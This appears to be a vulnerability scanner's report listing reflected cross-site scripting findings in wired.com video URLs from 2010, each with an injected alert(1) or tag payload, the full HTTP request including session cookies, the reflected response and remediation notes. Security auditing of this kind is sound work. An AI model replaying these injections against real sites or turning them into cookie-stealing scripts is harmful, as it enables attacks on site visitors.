The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50103"-alert(1)-"8e2c93350c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights50103"-alert(1)-"8e2c93350c0/1716440574/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:07 GMT Date: Mon, 22 Nov 2010 00:45:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d852"><a>c1b1288d9c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/highlights2d852"><a>c1b1288d9c5/1716440574/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:18 GMT Date: Mon, 22 Nov 2010 00:44:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106710
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_highlights2d852"><a>c1b1288d9c5"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a337e"-alert(1)-"f1cf29d2aaf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574a337e"-alert(1)-"f1cf29d2aaf/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=297 Expires: Mon, 22 Nov 2010 00:50:23 GMT Date: Mon, 22 Nov 2010 00:45:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... ipt type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2660b"-alert(1)-"2b0abda2f1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer2660b"-alert(1)-"2b0abda2f1/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:51 GMT Date: Mon, 22 Nov 2010 00:45:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106786
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90ca1"-alert(1)-"587a42270 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/68025405500190ca1"-alert(1)-"587a42270 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=297 Expires: Mon, 22 Nov 2010 00:51:13 GMT Date: Mon, 22 Nov 2010 00:46:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106765
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 6288f--><script>alert(1)</script>4d7dc58b639 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video6288f--><script>alert(1)</script>4d7dc58b639/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29488 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:27 GMT Date: Mon, 22 Nov 2010 00:45:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video6288f--><script>alert(1)</script>4d7dc58b639/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7fce"><a>4c58c684623 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videoa7fce"><a>4c58c684623/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29453 Vary: Accept-Encoding Cache-Control: max-age=298 Expires: Mon, 22 Nov 2010 00:49:43 GMT Date: Mon, 22 Nov 2010 00:44:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videoa7fce"><a>4c58c684623 ss_latest-videos c_highlights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 877c6"><a>f389d0665 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos877c6"><a>f389d0665/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=294 Expires: Mon, 22 Nov 2010 00:50:23 GMT Date: Mon, 22 Nov 2010 00:45:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106815
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos877c6"><a>f389d0665 c_highlights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d588"-alert(1)-"05979854152 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos9d588"-alert(1)-"05979854152/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=283 Expires: Mon, 22 Nov 2010 00:51:14 GMT Date: Mon, 22 Nov 2010 00:46:31 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106742
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23cf8"><a>abe91b1c201 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/highlights23cf8"><a>abe91b1c201/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=298 Expires: Mon, 22 Nov 2010 00:51:31 GMT Date: Mon, 22 Nov 2010 00:46:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106799
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_highlights23cf8"><a>abe91b1c201"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9abc"-alert(1)-"7723227df32 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlightsd9abc"-alert(1)-"7723227df32/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:52:43 GMT Date: Mon, 22 Nov 2010 00:47:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106803
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf961"-alert(1)-"8a5c791c98a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574bf961"-alert(1)-"8a5c791c98a/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:53:05 GMT Date: Mon, 22 Nov 2010 00:48:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106805
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd60e"-alert(1)-"3a818245bb6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40scd60e"-alert(1)-"3a818245bb6/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=278 Expires: Mon, 22 Nov 2010 00:52:54 GMT Date: Mon, 22 Nov 2010 00:48:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106778
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b836d"-alert(1)-"ccd59f0741 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001b836d"-alert(1)-"ccd59f0741 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:53:32 GMT Date: Mon, 22 Nov 2010 00:48:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106774
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fea0"><a>adc0cc061c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video8fea0"><a>adc0cc061c4/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29426 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:42 GMT Date: Mon, 22 Nov 2010 00:45:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video8fea0"><a>adc0cc061c4 ss_latest-videos c_highlights"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 8bb21--><script>alert(1)</script>1d4a681cdd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video8bb21--><script>alert(1)</script>1d4a681cdd1/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29461 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:51:17 GMT Date: Mon, 22 Nov 2010 00:46:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video8bb21--><script>alert(1)</script>1d4a681cdd1/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bc1a"-alert(1)-"126a372399a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos4bc1a"-alert(1)-"126a372399a/highlights/1716440574/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=279 Expires: Mon, 22 Nov 2010 00:51:57 GMT Date: Mon, 22 Nov 2010 00:47:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106761
